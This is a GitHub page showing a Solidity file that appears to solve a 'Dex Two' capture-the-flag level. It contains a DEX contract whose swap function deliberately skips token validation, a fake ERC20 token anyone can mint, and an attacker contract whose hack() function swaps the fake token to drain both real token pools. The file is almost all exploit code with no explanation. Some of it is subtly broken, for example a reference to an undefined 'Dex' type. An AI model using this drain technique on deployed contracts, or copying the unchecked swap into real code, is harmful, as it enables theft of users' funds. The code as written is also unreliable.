-
Notifications
You must be signed in to change notification settings - Fork 0
/
Dexxed2.sol
66 lines (51 loc) · 2.01 KB
/
Dexxed2.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
// SPDX-License-Identifier: MIT
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import '@openzeppelin/contracts/math/SafeMath.sol';
import '@openzeppelin/contracts/access/Ownable.sol';
contract DexTwo is Ownable {
using SafeMath for uint;
address public token1;
address public token2;
constructor() public {}
function setTokens(address _token1, address _token2) public onlyOwner {
token1 = _token1;
token2 = _token2;
}
function add_liquidity(address token_address, uint amount) public onlyOwner {
IERC20(token_address).transferFrom(msg.sender, address(this), amount);
}
function swap(address from, address to, uint amount) public {
require(IERC20(from).balanceOf(msg.sender) >= amount, "Not enough to swap");
uint swapAmount = getSwapAmount(from, to, amount);
IERC20(from).transferFrom(msg.sender, address(this), amount);
IERC20(to).approve(address(this), swapAmount);
IERC20(to).transferFrom(address(this), msg.sender, swapAmount);
}
function getSwapAmount(address from, address to, uint amount) public view returns(uint){
return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
}
function balanceOf(address token, address account) public view returns (uint){
return IERC20(token).balanceOf(account);
}
}
contract FakeToken is ERC20 {
constructor() ERC20("JAFOSTES", "JF"){
_mint(0x862e287502ecBFc4497c766BDe9CDEBDf322ff55, 100);
}
function mint(address cont, uint amount) public {
_mint(cont, amount);
}
}
contract Dexxed {
Dex dex = Dex(0x862e287502ecBFc4497c766BDe9CDEBDf322ff55);
address fakeToken = 0x71210fD32A26C80A92690ae953C4285A0069c2f6;
function hack() public {
dex.swap(fakeToken, dex.token1(), 100);
dex.swap(fakeToken, dex.token2(), 200);
}
function approve() public {
ERC20(fakeToken).approve(address(dex), 300);
}
}